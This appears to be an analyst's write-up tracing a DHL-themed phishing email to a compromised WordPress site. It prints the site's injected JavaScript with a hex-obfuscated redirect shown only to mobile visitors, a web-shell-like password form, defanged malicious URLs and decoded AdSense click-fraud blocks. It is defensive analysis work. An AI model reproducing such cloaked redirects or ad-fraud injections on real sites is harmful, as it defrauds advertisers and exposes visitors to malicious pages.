Contains four urls.
hxxps[://]merchspace[.]co/bpz7/x/
hxxps[://]del[.]dhl[.]com/img/email_assets/images/header[.]jpg
hxxps[://]del[.]dhl[.]com/img/email_assets/logo/onepixel[.]png
hxxps[://]www[.]dhl[.]hu/hu/expressz[.]html
We will trace down the artifact in Email Header first:
X-PHP-Script: alwaysnbs[.]tv/gZ5c4T1wNAr[.]php
Outputs:
<pre align=center><form method=post>Password: <input type='password' name='pass'><input type='submit' value='>>'></form></pre>
The interesting part is if we get the domain instead:
$ curl -L hxxp[://]alwaysnbs[.]tv/
Outputs HTML code to a “Expired Wordpress site”
<html>
<head>
<title>COMING SOON</title>
<body>
<div class="bgimg">
<div class="middle">
<h1>COMING SOON</h1>
<hr>
<p id="demo" style="font-size:30px"></p>
</div>
</div>
<style>
body,
html {
height: 100%;
margin: 0;
}
.bgimg {
background-image: url("https://i.imgur.com/xA8aaXN.png");
height: 100%;
background-position: center;
background-size: cover;
position: relative;
color: white;
font-family: "Courier New", Courier, monospace;
font-size: 25px;
}
.topleft {
position: absolute;
top: 0;
left: 16px;
}
.bottomleft {
position: absolute;
bottom: 0;
left: 16px;
}
.middle {
position: absolute;
top: 80%;
left: 50%;
transform: translate(-50%, -50%);
text-align: center;
}
hr {
margin: auto;
width: 40%;
}
</style>
</head>
<body>
<script>
var countDownDate = new Date("Jun 30, 2023 12:14:54").getTime();
var countdownfunction = setInterval(function() {
var now = new Date().getTime();
var distance = countDownDate - now;
var days = Math.floor(distance / (1000 * 60 * 60 * 24));
var hours = Math.floor((distance % (1000 * 60 * 60 * 24)) / (1000 * 60 * 60));
var minutes = Math.floor((distance % (1000 * 60 * 60)) / (1000 * 60));
var seconds = Math.floor((distance % (1000 * 60)) / 1000);
document.getElementById("demo").innerHTML = days + "d " + hours + "h " + minutes + "m " + seconds + "s ";
if (distance < 0) {
clearInterval(countdownfunction);
document.getElementById("demo").innerHTML = "EXPIRED";
}
}, 1000);
window.mobileCheck = function() {
let check = false;
(function(a){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))) check = true;})(navigator.userAgent||navigator.vendor||window.opera);
return check;
};
if (window.mobileCheck()) {
window.location.href="\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x2d\x74\x2e\x61\x73\x69\x61\x2f\x7a\x72\x65\x30\x72\x39";
}
</script>
If the mobileCheck is true to the corresponding user agent (Mobile device) it redirects the user to an obfuscated link
\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x2d\x74\x2e\x61\x73\x69\x61\x2f\x7a\x72\x65\x30\x72\x39
Hex encoded url decoded to string:
hxxp[://]n-t[.]asia/zre0r9
Virustotal scan flagged by three vendors as malicous:
https://www.virustotal.com/gui/url/feca5c49614b2a530fd369a7e750ad13ac712fd699eb8f9cb84af7bf9456fb6b/detection
If we send the User agent string of an mobile device and enter that page with curl:
─$ curl -A “Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Mobile/15E148 Safari/604.1” -L hxxp[://]n-t[.]asia/zre0r9
Outputs:
<script src="https://www.google.com/search?client=firefox-b-d&q=Crypto+Adoption+On+The+Rise+In+Nigeria"></script>
<script src="https://www.google.com/search?client=firefox-b-d&q=Crypto+Adoption+On+The+Rise+In+Nigeria+Uganda+Chainalysis"></script>
<script>
function sleep(milliseconds) {
return new Promise(resolve => setTimeout(resolve, milliseconds));
}
async function fun() {
await sleep(1000);
}
fun();
</script>
<script src="https://www.google.com/search?client=firefox-b-d&q=Crypto+Adoption+On+The+Rise+In+Nigeria+Uganda+Chainalysis+Toyori+News"></script>
<script>
function sleep2(milliseconds) {
return new Promise(resolve => setTimeout(resolve, milliseconds));
}
async function fun2() {
await sleep2(1500);
window.location.href="https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwjM5fLRtLmBAxUsVKQEHQ3LAgkQFnoECBEQAQ&url=https%3A%2F%2Fen.toyorimix.com%2F705%2Fcrypto-adoption-on-the-rise-in-nigeria-uganda-chainalysis.html&usg=AOvVaw0Kn1x47psTWP0VLFeET7bu&opi=89978449";
}
fun2();
</script>
Seems to request a “fake” search on google three times as from a Mozilla Firefox client.
URL redirected to after sleep2:
hxxps[://]en[.]toyorimix[.]com/705/crypto-adoption-on-the-rise-in-nigeria-uganda-chainalysis[.]html
This site outputs a lot of html code with several news sections and links about crypto.
At the end shows a large section of code in <script> tag shown below. Why?
<script>
function b2a(a){var b,c=0,l=0,f="",g=[];if(!a)return a;do{var e=a.charCodeAt(c++);var h=a.charCodeAt(c++);var k=a.charCodeAt(c++);var d=e<<16|h<<8|k;e=63&d>>18;h=63&d>>12;k=63&d>>6;d&=63;g[l++]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(e)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(h)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(k)+"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=".charAt(d)}while(c<
a.length);return f=g.join(""),b=a.length%3,(b?f.slice(0,b-3):f)+"===".slice(b||3)}function a2b(a){var b,c,l,f={},g=0,e=0,h="",k=String.fromCharCode,d=a.length;for(b=0;64>b;b++)f["ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charAt(b)]=b;for(c=0;d>c;c++)for(b=f[a.charAt(c)],g=(g<<6)+b,e+=6;8<=e;)((l=255&g>>>(e-=8))||d-2>c)&&(h+=k(l));return h}b64e=function(a){return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g,function(b,a){return String.fromCharCode("0x"+a)}))};
b64d=function(a){return decodeURIComponent(atob(a).split("").map(function(a){return"%"+("00"+a.charCodeAt(0).toString(16)).slice(-2)}).join(""))};
/* <![CDATA[ */
ai_front = {"insertion_before":"BEFORE","insertion_after":"AFTER","insertion_prepend":"PREPEND CONTENT","insertion_append":"APPEND CONTENT","insertion_replace_content":"REPLACE CONTENT","insertion_replace_element":"REPLACE ELEMENT","visible":"VISIBLE","hidden":"HIDDEN","fallback":"FALLBACK","automatically_placed":"Automatically placed by AdSense Auto ads code","cancel":"Cancel","use":"Use","add":"Add","parent":"Parent","cancel_element_selection":"Cancel element selection","select_parent_element":"Select parent element","css_selector":"CSS selector","use_current_selector":"Use current selector","element":"ELEMENT","path":"PATH","selector":"SELECTOR"};
/* ]]> */
var ai_cookie_js=!0,ai_block_class_def="code-block";
/*
JavaScript Cookie v2.2.0
https://github.com/js-cookie/js-cookie
Copyright 2006, 2015 Klaus Hartl & Fagner Brack
Released under the MIT license
*/
(REMOVED HUNDREDS OF ROWS HERE)
(REMOVED HUNDREDS OF ROWS HERE)
(REMOVED HUNDREDS OF ROWS HERE)
(REMOVED HUNDREDS OF ROWS HERE)
(REMOVED HUNDREDS OF ROWS HERE)
ai_document_write=document.write;document.write=function(a){"interactive"==document.readyState?(console.error("document.write called after page load: ",a),"undefined"!=typeof ai_js_errors&&ai_js_errors.push(["document.write called after page load",a,0])):ai_document_write.call(document,a)};
ai_insert_viewport_code ('ai-insert-3-93943379');
ai_insert_viewport_code ('ai-insert-2-82635796');
ai_insert_viewport_code ('ai-insert-3-41962762');
ai_insert_viewport_code ('ai-insert-2-78081723');
ai_insert_viewport_code ('ai-insert-3-63237526');
ai_insert_viewport_code ('ai-insert-2-85357086');
ai_insert_viewport_code ('ai-insert-3-83839844');
ai_insert_viewport_code ('ai-insert-2-89937754');
ai_insert_viewport_code ('ai-insert-3-99212590');
ai_insert_viewport_code ('ai-insert-2-46193103');
ai_insert_viewport_code ('ai-insert-3-98924738');
ai_insert_viewport_code ('ai-insert-2-94314526');
ai_insert_viewport_code ('ai-insert-3-90173253');
ai_insert_viewport_code ('ai-insert-2-97932548');
ai_insert_viewport_code ('ai-insert-1-47102637');
};
if (document.readyState === 'complete' || (document.readyState !== 'loading' && !document.documentElement.doScroll)) ai_run_684363621304 (); else document.addEventListener ('DOMContentLoaded', ai_run_684363621304);
ai_js_code = true;
</script>
After some research online, especially on the last rows about ai. I found several posts about this was part of a “AdSense fraud campaign” infecting Wordpress sites. Using Google Ads click rate to monetize, spawning several ads on the infected site only shown if entered as “Mobile Device” which has been a main thread from the start.
In my example i found similar code in <div> tags
Also got the Base64 encoded “data-code” blocks to identify the Google Ad ID:
CodeBlock1:
PGRpdiBjbGFzcz0nY29kZS1ibG9jayBjb2RlLWJsb2NrLTIgYWktdHJhY2snIGRhdGEtYWk9J1d6SXNNQ3dpUW14dlkyc2dNaUlzSWlJc01WMD0nIHN0eWxlPSdtYXJnaW46IDhweCBhdXRvOyB0ZXh0LWFsaWduOiBjZW50ZXI7IGRpc3BsYXk6IGJsb2NrOyBjbGVhcjogYm90aDsnPgo8ZGl2IGNsYXNzPSJhaS1jaGVjay1yZWNhcHRjaGEtc2NvcmUgYWktY2hlY2stcmVjYXB0Y2hhLXNjb3JlLTIiIGRhdGEtY29kZT0iUEdScGRpQmpiR0Z6Y3owbmJtOHRkbWx6YVdKcGJHbDBlUzFqYUdWamF5QmhhUzFqYUdWamF5MHlMVGt3TlRRMk9UYzBKeUJrWVhSaExXbHVjMlZ5ZEdsdmJpMXdiM05wZEdsdmJqMG5ZV1owWlhJbklHUmhkR0V0YzJWc1pXTjBiM0k5Snk1aGFTMWphR1ZqYXkweUxUa3dOVFEyT1RjMEp5QmtZWFJoTFdOdlpHVTlKMUJIVW5Ca2FVSnFZa2RHZW1ONk1HbFpWMnQwV1ZoU01HTnRiR2xrV0ZKc1kzbEpLME5xZUhwalIwWjFTVWRPYzFsWVRucFFVMlJvWVZNeGFtRkhWbXBoZVRGcFlrYzVhbUY1UW1oaFV6RnFXbTVCYmtsSFVtaGtSMFYwV1ZkcmRGbHRlSFpaTW5NNVNucEpia2xIVW1oa1IwVjBXVmRyZEZveWVIWlpiVVp6VEZkNGNHSlhiREJNVjA1ellWZE9jbU41TVhkYVdFbDBaRWRzZEZwVU1HNU5hV05uV2tkR01GbFRNV2hoVXpGdVlrYzVhVmxYZDNSaVIyeDBZVmhSZEZreWVIQlpNblI2VEZoU2NHSlhWVGxLZWtGMVRsTmpaMXBIUmpCWlV6Rm9ZVk14YWxwdVFYUmtSMngwV2xRd2JrMVRZeXRRUXpsNlkwZEdkVkJuYnpoTU1sSndaR28wUzFCSFVuQmthVUp3V2tReE1HSXpheXREYW5oNldUTktjR05JVVdkWldFNDFZbTFOWjJNelNtcFFVMHB2WkVoU2QyTjZiM1pNTTBKb1dqSldhRnBFU1hWYU1qbDJXako0YkdNemJIVmFSMnhxV1ZoU2NHSXlOSFZaTWpsMFRETkNhRm95Vm1oYVF6bHhZM2s1YUZwSVRtbGxWMlIyWWpKa2MxcFROWEZqZWpscVlrZHNiR0p1VVRsWk1rVjBZMGhXYVV4VWEzbE5WRTAxVFVSTk1FNTZUWGxQVkVGNlRWUkphVU5wUVdkSlEwRm5XVE5LZG1NelRuWmpiV3h1WVZjME9VbHRSblZpTWpVMVlsYzVNV041U1N0UVF6bDZXVE5LY0dOSVVTdERhbmRvVEZNd1oySlhPVEJOVTBGMFRGUTBTMUJIYkhWamVVSnFZa2RHZW1ONk1HbFpWMUo2V1c1c2JtSXlPVzVpUjFWcFEybEJaMGxEUVdkak0xSTFZa2RWT1VsdFVuQmpNMEp6V1Zock5tRlhOWE5oVnpWc1RGZEtjMkl5VG5KUE0yUndXa2hTYjA5cVRYZE5TRUkwVHpKb2JHRlhaRzlrUkc4eVRVUkNkMlZEU1V0SlEwRm5TVU5DYTFsWVVtaE1WMFpyVEZkT2MyRlhWblZrUkRCcFdUSkZkR05JVm1sTVZHdDVUVlJOTlUxRVRUQk9lazE1VDFSQmVrMVVTV2xEYVVGblNVTkJaMXBIUmpCWlV6Rm9Xa014ZW1KSE9UQlFVMGw2VG1wSk5FNTZRVEpQUkVrMVNXbzBPRXd5YkhWamVqUkxVRWhPYW1OdGJIZGtSRFJMU1VOQlowbERRVzlaVjFKNldXNXNibUl5T1c1aVIxVm5VRk5DTTJGWE5XdGlNMk4xV1ZkU2VsbHViRzVpTWpsdVlrZFZaMlpJZDJkWE1UQndURzVDTVdNeVoyOWxNekJ3VDNkdk9Fd3pUbXBqYld4M1pFUTBTMUJET1d0aFdGa3JKeUJrWVhSaExXSnNiMk5yUFNjeUp6NDhjM0JoYmlCamJHRnpjejBuWVdrdFkyaGxZMnN0WW14dlkyc2dZV2t0WTJad0p5QmtZWFJoTFdGcExXSnNiMk5yUFNjeUp5QmtZWFJoTFdGcExXZHNiMkpoYkMxc2FXMXBkQzFqYkdsamEzTXRjR1Z5TFhScGJXVTlKekluSUdSaGRHRXRZV2t0WjJ4dlltRnNMV3hwYldsMExXTnNhV05yY3kxMGFXMWxQU2N3TGpVbklHUmhkR0V0WVdrdFkyWndMWFJwYldVOUp6RW5Qand2YzNCaGJqNDhMMlJwZGo0S1BDRXRMU0JCU1Y5S1V5QXRMVDQ4YzJOeWFYQjBQZ29nSUdGcFgzSjFibDh6TVRFeU1qWTFNek16TlRFZ1BTQm1kVzVqZEdsdmJpZ3BleThxSUVGSlgwcFRJQ292WVdsZlkyaGxZMnRmWVc1a1gybHVjMlZ5ZEY5aWJHOWpheUFvTWl3Z0oyRnBMV05vWldOckxUSXRPVEExTkRZNU56UW5LVHN2S2lCQlNWOUtVeUFxTDMwN0NpQWdhV1lnS0dSdlkzVnRaVzUwTG5KbFlXUjVVM1JoZEdVZ1BUMDlJQ2RqYjIxd2JHVjBaU2NnZkh3Z0tHUnZZM1Z0Wlc1MExuSmxZV1I1VTNSaGRHVWdJVDA5SUNkc2IyRmthVzVuSnlBbUppQWhaRzlqZFcxbGJuUXVaRzlqZFcxbGJuUkZiR1Z0Wlc1MExtUnZVMk55YjJ4c0tTa2dZV2xmY25WdVh6TXhNVEl5TmpVek16TTFNU0FvS1RzZ1pXeHpaU0JrYjJOMWJXVnVkQzVoWkdSRmRtVnVkRXhwYzNSbGJtVnlJQ2duUkU5TlEyOXVkR1Z1ZEV4dllXUmxaQ2NzSUdGcFgzSjFibDh6TVRFeU1qWTFNek16TlRFcE93bzhMM05qY21sd2RENDhJUzB0SUVGSlgwcFRJQzB0UGdvPSIgZGF0YS1jbGFzcz0iWTI5a1pTMWliRzlqYXc9PSI+PC9kaXY+CjwvZGl2Pgo=
Decoded as:
<div class='code-block code-block-2 ai-track' data-ai='WzIsMCwiQmxvY2sgMiIsIiIsMV0=' style='margin: 8px auto; text-align: center; display: block; clear: both;'>
<div class="ai-check-recaptcha-score ai-check-recaptcha-score-2" data-code="PGRpdiBjbGFzcz0nbm8tdmlzaWJpbGl0eS1jaGVjayBhaS1jaGVjay0yLTkwNTQ2OTc0JyBkYXRhLWluc2VydGlvbi1wb3NpdGlvbj0nYWZ0ZXInIGRhdGEtc2VsZWN0b3I9Jy5haS1jaGVjay0yLTkwNTQ2OTc0JyBkYXRhLWNvZGU9J1BHUnBkaUJqYkdGemN6MGlZV2t0WVhSMGNtbGlkWFJsY3lJK0NqeHpjR0Z1SUdOc1lYTnpQU2RoYVMxamFHVmpheTFpYkc5amF5QmhhUzFqWm5BbklHUmhkR0V0WVdrdFlteHZZMnM5SnpJbklHUmhkR0V0WVdrdFoyeHZZbUZzTFd4cGJXbDBMV05zYVdOcmN5MXdaWEl0ZEdsdFpUMG5NaWNnWkdGMFlTMWhhUzFuYkc5aVlXd3RiR2x0YVhRdFkyeHBZMnR6TFhScGJXVTlKekF1TlNjZ1pHRjBZUzFoYVMxalpuQXRkR2x0WlQwbk1TYytQQzl6Y0dGdVBnbzhMMlJwZGo0S1BHUnBkaUJwWkQxMGIzaytDanh6WTNKcGNIUWdZWE41Ym1NZ2MzSmpQU0pvZEhSd2N6b3ZMM0JoWjJWaFpESXVaMjl2WjJ4bGMzbHVaR2xqWVhScGIyNHVZMjl0TDNCaFoyVmhaQzlxY3k5aFpITmllV2R2YjJkc1pTNXFjejlqYkdsbGJuUTlZMkV0Y0hWaUxUa3lNVE01TURNME56TXlPVEF6TVRJaUNpQWdJQ0FnWTNKdmMzTnZjbWxuYVc0OUltRnViMjU1Ylc5MWN5SStQQzl6WTNKcGNIUStDandoTFMwZ2JXOTBNU0F0TFQ0S1BHbHVjeUJqYkdGemN6MGlZV1J6WW5sbmIyOW5iR1VpQ2lBZ0lDQWdjM1I1YkdVOUltUnBjM0JzWVhrNmFXNXNhVzVsTFdKc2IyTnJPM2RwWkhSb09qTXdNSEI0TzJobGFXZG9kRG8yTURCd2VDSUtJQ0FnSUNCa1lYUmhMV0ZrTFdOc2FXVnVkRDBpWTJFdGNIVmlMVGt5TVRNNU1ETTBOek15T1RBek1USWlDaUFnSUNBZ1pHRjBZUzFoWkMxemJHOTBQU0l6TmpJNE56QTJPREk1SWo0OEwybHVjejRLUEhOamNtbHdkRDRLSUNBZ0lDQW9ZV1J6WW5sbmIyOW5iR1VnUFNCM2FXNWtiM2N1WVdSellubG5iMjluYkdVZ2ZId2dXMTBwTG5CMWMyZ29lMzBwT3dvOEwzTmpjbWx3ZEQ0S1BDOWthWFkrJyBkYXRhLWJsb2NrPScyJz48c3BhbiBjbGFzcz0nYWktY2hlY2stYmxvY2sgYWktY2ZwJyBkYXRhLWFpLWJsb2NrPScyJyBkYXRhLWFpLWdsb2JhbC1saW1pdC1jbGlja3MtcGVyLXRpbWU9JzInIGRhdGEtYWktZ2xvYmFsLWxpbWl0LWNsaWNrcy10aW1lPScwLjUnIGRhdGEtYWktY2ZwLXRpbWU9JzEnPjwvc3Bhbj48L2Rpdj4KPCEtLSBBSV9KUyAtLT48c2NyaXB0PgogIGFpX3J1bl8zMTEyMjY1MzMzNTEgPSBmdW5jdGlvbigpey8qIEFJX0pTICovYWlfY2hlY2tfYW5kX2luc2VydF9ibG9jayAoMiwgJ2FpLWNoZWNrLTItOTA1NDY5NzQnKTsvKiBBSV9KUyAqL307CiAgaWYgKGRvY3VtZW50LnJlYWR5U3RhdGUgPT09ICdjb21wbGV0ZScgfHwgKGRvY3VtZW50LnJlYWR5U3RhdGUgIT09ICdsb2FkaW5nJyAmJiAhZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmRvU2Nyb2xsKSkgYWlfcnVuXzMxMTIyNjUzMzM1MSAoKTsgZWxzZSBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyICgnRE9NQ29udGVudExvYWRlZCcsIGFpX3J1bl8zMTEyMjY1MzMzNTEpOwo8L3NjcmlwdD48IS0tIEFJX0pTIC0tPgo=" data-class="Y29kZS1ibG9jaw=="></div>
</div>
CodeBlock2:
PGRpdiBjbGFzcz0nbm8tdmlzaWJpbGl0eS1jaGVjayBhaS1jaGVjay0yLTkwNTQ2OTc0JyBkYXRhLWluc2VydGlvbi1wb3NpdGlvbj0nYWZ0ZXInIGRhdGEtc2VsZWN0b3I9Jy5haS1jaGVjay0yLTkwNTQ2OTc0JyBkYXRhLWNvZGU9J1BHUnBkaUJqYkdGemN6MGlZV2t0WVhSMGNtbGlkWFJsY3lJK0NqeHpjR0Z1SUdOc1lYTnpQU2RoYVMxamFHVmpheTFpYkc5amF5QmhhUzFqWm5BbklHUmhkR0V0WVdrdFlteHZZMnM5SnpJbklHUmhkR0V0WVdrdFoyeHZZbUZzTFd4cGJXbDBMV05zYVdOcmN5MXdaWEl0ZEdsdFpUMG5NaWNnWkdGMFlTMWhhUzFuYkc5aVlXd3RiR2x0YVhRdFkyeHBZMnR6TFhScGJXVTlKekF1TlNjZ1pHRjBZUzFoYVMxalpuQXRkR2x0WlQwbk1TYytQQzl6Y0dGdVBnbzhMMlJwZGo0S1BHUnBkaUJwWkQxMGIzaytDanh6WTNKcGNIUWdZWE41Ym1NZ2MzSmpQU0pvZEhSd2N6b3ZMM0JoWjJWaFpESXVaMjl2WjJ4bGMzbHVaR2xqWVhScGIyNHVZMjl0TDNCaFoyVmhaQzlxY3k5aFpITmllV2R2YjJkc1pTNXFjejlqYkdsbGJuUTlZMkV0Y0hWaUxUa3lNVE01TURNME56TXlPVEF6TVRJaUNpQWdJQ0FnWTNKdmMzTnZjbWxuYVc0OUltRnViMjU1Ylc5MWN5SStQQzl6WTNKcGNIUStDandoTFMwZ2JXOTBNU0F0TFQ0S1BHbHVjeUJqYkdGemN6MGlZV1J6WW5sbmIyOW5iR1VpQ2lBZ0lDQWdjM1I1YkdVOUltUnBjM0JzWVhrNmFXNXNhVzVsTFdKc2IyTnJPM2RwWkhSb09qTXdNSEI0TzJobGFXZG9kRG8yTURCd2VDSUtJQ0FnSUNCa1lYUmhMV0ZrTFdOc2FXVnVkRDBpWTJFdGNIVmlMVGt5TVRNNU1ETTBOek15T1RBek1USWlDaUFnSUNBZ1pHRjBZUzFoWkMxemJHOTBQU0l6TmpJNE56QTJPREk1SWo0OEwybHVjejRLUEhOamNtbHdkRDRLSUNBZ0lDQW9ZV1J6WW5sbmIyOW5iR1VnUFNCM2FXNWtiM2N1WVdSellubG5iMjluYkdVZ2ZId2dXMTBwTG5CMWMyZ29lMzBwT3dvOEwzTmpjbWx3ZEQ0S1BDOWthWFkrJyBkYXRhLWJsb2NrPScyJz48c3BhbiBjbGFzcz0nYWktY2hlY2stYmxvY2sgYWktY2ZwJyBkYXRhLWFpLWJsb2NrPScyJyBkYXRhLWFpLWdsb2JhbC1saW1pdC1jbGlja3MtcGVyLXRpbWU9JzInIGRhdGEtYWktZ2xvYmFsLWxpbWl0LWNsaWNrcy10aW1lPScwLjUnIGRhdGEtYWktY2ZwLXRpbWU9JzEnPjwvc3Bhbj48L2Rpdj4KPCEtLSBBSV9KUyAtLT48c2NyaXB0PgogIGFpX3J1bl8zMTEyMjY1MzMzNTEgPSBmdW5jdGlvbigpey8qIEFJX0pTICovYWlfY2hlY2tfYW5kX2luc2VydF9ibG9jayAoMiwgJ2FpLWNoZWNrLTItOTA1NDY5NzQnKTsvKiBBSV9KUyAqL307CiAgaWYgKGRvY3VtZW50LnJlYWR5U3RhdGUgPT09ICdjb21wbGV0ZScgfHwgKGRvY3VtZW50LnJlYWR5U3RhdGUgIT09ICdsb2FkaW5nJyAmJiAhZG9jdW1lbnQuZG9jdW1lbnRFbGVtZW50LmRvU2Nyb2xsKSkgYWlfcnVuXzMxMTIyNjUzMzM1MSAoKTsgZWxzZSBkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyICgnRE9NQ29udGVudExvYWRlZCcsIGFpX3J1bl8zMTEyMjY1MzMzNTEpOwo8L3NjcmlwdD48IS0tIEFJX0pTIC0tPgo
Decoded as:
<div class='no-visibility-check ai-check-2-90546974' data-insertion-position='after' data-selector='.ai-check-2-90546974' data-code='PGRpdiBjbGFzcz0iYWktYXR0cmlidXRlcyI+CjxzcGFuIGNsYXNzPSdhaS1jaGVjay1ibG9jayBhaS1jZnAnIGRhdGEtYWktYmxvY2s9JzInIGRhdGEtYWktZ2xvYmFsLWxpbWl0LWNsaWNrcy1wZXItdGltZT0nMicgZGF0YS1haS1nbG9iYWwtbGltaXQtY2xpY2tzLXRpbWU9JzAuNScgZGF0YS1haS1jZnAtdGltZT0nMSc+PC9zcGFuPgo8L2Rpdj4KPGRpdiBpZD10b3k+CjxzY3JpcHQgYXN5bmMgc3JjPSJodHRwczovL3BhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tL3BhZ2VhZC9qcy9hZHNieWdvb2dsZS5qcz9jbGllbnQ9Y2EtcHViLTkyMTM5MDM0NzMyOTAzMTIiCiAgICAgY3Jvc3NvcmlnaW49ImFub255bW91cyI+PC9zY3JpcHQ+CjwhLS0gbW90MSAtLT4KPGlucyBjbGFzcz0iYWRzYnlnb29nbGUiCiAgICAgc3R5bGU9ImRpc3BsYXk6aW5saW5lLWJsb2NrO3dpZHRoOjMwMHB4O2hlaWdodDo2MDBweCIKICAgICBkYXRhLWFkLWNsaWVudD0iY2EtcHViLTkyMTM5MDM0NzMyOTAzMTIiCiAgICAgZGF0YS1hZC1zbG90PSIzNjI4NzA2ODI5Ij48L2lucz4KPHNjcmlwdD4KICAgICAoYWRzYnlnb29nbGUgPSB3aW5kb3cuYWRzYnlnb29nbGUgfHwgW10pLnB1c2goe30pOwo8L3NjcmlwdD4KPC9kaXY+' data-block='2'><span class='ai-check-block ai-cfp' data-ai-block='2' data-ai-global-limit-clicks-per-time='2' data-ai-global-limit-clicks-time='0.5' data-ai-cfp-time='1'></span></div>
<!-- AI_JS --><script>
CodeBlock3:
PGRpdiBjbGFzcz0iYWktYXR0cmlidXRlcyI+CjxzcGFuIGNsYXNzPSdhaS1jaGVjay1ibG9jayBhaS1jZnAnIGRhdGEtYWktYmxvY2s9JzInIGRhdGEtYWktZ2xvYmFsLWxpbWl0LWNsaWNrcy1wZXItdGltZT0nMicgZGF0YS1haS1nbG9iYWwtbGltaXQtY2xpY2tzLXRpbWU9JzAuNScgZGF0YS1haS1jZnAtdGltZT0nMSc+PC9zcGFuPgo8L2Rpdj4KPGRpdiBpZD10b3k+CjxzY3JpcHQgYXN5bmMgc3JjPSJodHRwczovL3BhZ2VhZDIuZ29vZ2xlc3luZGljYXRpb24uY29tL3BhZ2VhZC9qcy9hZHNieWdvb2dsZS5qcz9jbGllbnQ9Y2EtcHViLTkyMTM5MDM0NzMyOTAzMTIiCiAgICAgY3Jvc3NvcmlnaW49ImFub255bW91cyI+PC9zY3JpcHQ+CjwhLS0gbW90MSAtLT4KPGlucyBjbGFzcz0iYWRzYnlnb29nbGUiCiAgICAgc3R5bGU9ImRpc3BsYXk6aW5saW5lLWJsb2NrO3dpZHRoOjMwMHB4O2hlaWdodDo2MDBweCIKICAgICBkYXRhLWFkLWNsaWVudD0iY2EtcHViLTkyMTM5MDM0NzMyOTAzMTIiCiAgICAgZGF0YS1hZC1zbG90PSIzNjI4NzA2ODI5Ij48L2lucz4KPHNjcmlwdD4KICAgICAoYWRzYnlnb29nbGUgPSB3aW5kb3cuYWRzYnlnb29nbGUgfHwgW10pLnB1c2goe30pOwo8L3NjcmlwdD4KPC9kaXY+
Last Code block decoded as:
<div class="ai-attributes">
<span class='ai-check-block ai-cfp' data-ai-block='2' data-ai-global-limit-clicks-per-time='2' data-ai-global-limit-clicks-time='0.5' data-ai-cfp-time='1'></span>
</div>
<div id=toy>
<script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-9213903473290312"
crossorigin="anonymous"></script>
<!-- mot1 -->
<ins class="adsbygoogle"
